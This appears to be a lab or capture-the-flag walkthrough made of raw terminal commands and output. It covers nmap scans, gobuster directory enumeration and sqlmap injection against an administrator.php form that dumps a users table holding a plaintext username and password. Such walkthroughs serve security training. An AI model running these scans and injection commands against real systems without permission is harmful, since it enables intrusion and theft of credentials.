$ nmap 10.10.249.70 -v
22/tcp open ssh
80/tcp open http
$ nmap 10.10.249.70 -v -A -p22,80
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
| 256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_ 256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ gobuster dir -u 10.10.249.70 -w /usr/share/wordlists/dirb/big.txt -x "php,txt"
$ sqlmap -u http://10.10.239.224/administrator.php --forms --dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
$ sqlmap -u http://10.10.239.224/administrator.php --forms -D users --tables
Database: users
[1 table]
+-------+
| users |
+-------+
$ sqlmap -u http://10.10.239.224/administrator.php --forms -D users -T users --columns
Database: users
Table: users
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
| username | varchar(100) |
+----------+--------------+
$ sqlmap -u http://10.10.239.224/administrator.php --forms -D users -T users --dump
Database: users
Table: users
[1 entry]
+----------+------------+
| username | password   |
+----------+------------+
| pingudad | secretpass |
+----------+------------+
Log in with the dumped credentials.